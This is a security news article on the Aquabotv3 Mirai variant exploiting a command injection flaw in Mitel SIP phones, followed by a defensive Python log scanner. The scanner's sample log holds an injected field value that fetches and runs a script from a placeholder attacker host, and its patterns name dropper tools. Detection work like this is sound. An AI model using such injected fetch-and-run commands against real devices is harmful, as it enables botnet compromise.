New Aquabot Malware Attacking Mitel SIP To Inject Commands

A new variant of the Mirai-based malware, dubbed Aquabotv3, has been identified by the Akamai Security Intelligence and Response Team (SIRT).

This malware is actively exploiting a command injection vulnerability in Mitel SIP phones to execute malicious commands and propagate itself across networks.

This marks a concerning evolution in botnet capabilities, as Aquabotv3 introduces novel features not previously observed in Mirai variants.

The attack leverages CVE-2024-41710, a critical command injection vulnerability affecting Mitel 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit running firmware R6.4.0.HF1 or earlier.

The flaw arises from improper input sanitization in the web administration interface, allowing attackers to inject arbitrary commands via specially crafted HTTP POST requests.

This vulnerability enables attackers to gain root access to the device, manipulate configuration files, and execute malicious scripts during the device’s boot process.

Analysts at Akamai identified a proof-of-concept (PoC) exploit demonstrating how attackers could use this flaw to smuggle commands through unsanitized inputs.

For instance, targeting the endpoint /8021xsupport.html, attackers can modify local configuration files and execute shell scripts during startup.

Early January 2025 saw active exploitation of this vulnerability in the wild, with attackers deploying payloads to fetch and execute Mirai-based malware binaries across multiple architectures (x86, ARM).


Aquabotv3: A New Threat

Aquabotv3 distinguishes itself from earlier Aquabot variants by incorporating a unique function called report_kill().

The report_kill() function sending kill attempts to the C2 (Source – Akamai)

This feature allows the malware to notify its command-and-control (C2) server whenever it detects termination signals (SIGTERM or SIGKILL). While this behavior’s purpose remains unclear, it may enable threat actors to monitor botnet health or adapt their tactics against defensive measures.

Disassembly of signal-catching function (Source – Akamai)

The malware retains traditional Mirai functionalities such as distributed denial-of-service (DDoS) attacks but also includes obfuscation techniques for persistence.

Advertisement on one of the botnet’s domains (Source – Akamai)

For example, it renames itself to mimic legitimate processes like “httpd.x86” and establishes communication with C2 servers over specific ports.

In addition to targeting Mitel SIP phones, Aquabotv3 exploits other vulnerabilities to expand its reach.

These include Hadoop YARN (CVE-2018-17532), Linksys E-series RCE (CVE-2018-10562), and others.

Organizations using Mitel SIP phones are urged to:

  • Apply firmware updates addressing CVE-2024-41710.
  • Implement network segmentation to isolate vulnerable devices.
  • Monitor for indicators of compromise (IoCs), such as outbound traffic to known malicious IPs or domains.
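One way to act on the monitoring advice above is to watch the phone's web-interface access logs for the exploitation pattern the article describes: POST requests to /8021xsupport.html whose form fields carry shell metacharacters or download-and-execute keywords. The scanner below is an added example, not code from the article or from Akamai's report; the log line format, the form field names and the sample entries are all constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample log lines in an assumed 'METHOD PATH STATUS "BODY"' format.
# Field names (enable8021x, identity, password) are assumptions, not the phone's real parameters.
SAMPLE_LOG = [
    'POST /8021xsupport.html 200 "enable8021x=1&identity=phone42&password=s3cret"',
    'POST /8021xsupport.html 200 "enable8021x=1&identity=x%3Bwget+http%3A%2F%2Fattacker.invalid%2Fa.sh%3Bsh+a.sh&password=y"',
    'GET /index.html 200 ""',
    'POST /login.html 302 "username=admin&password=admin"',
]

TARGET_PATH = "/8021xsupport.html"
# Shell metacharacters that have no place in an 802.1X identity or password field.
META = re.compile(r"[;|`$<>\n]|\$\(")
# Fetch-and-run keywords typical of Mirai-style droppers.
DROPPER = re.compile(r"\b(wget|curl|tftp|busybox|chmod|sh)\b", re.I)

LOG_RE = re.compile(r'^(?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) "(?P<body>.*)"$')


def parse_line(line):
    """Split one access-log line into its method, path, status and raw form body."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_fields(body):
    """Return the names of form fields whose URL-decoded value looks like injected shell syntax."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if META.search(value) or DROPPER.search(value):
            hits.append(name)
    return hits


def scan(lines):
    """Flag POSTs to the vulnerable endpoint that carry suspicious field values."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != TARGET_PATH:
            continue
        fields = suspicious_fields(rec["body"])
        if fields:
            alerts.append({"path": rec["path"], "fields": fields})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print("possible CVE-2024-41710 exploitation attempt:", alert)
```

A hit on this rule is a trigger for the other two steps in the list: isolate the phone and confirm its firmware level.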


Tushar Subhra Dutta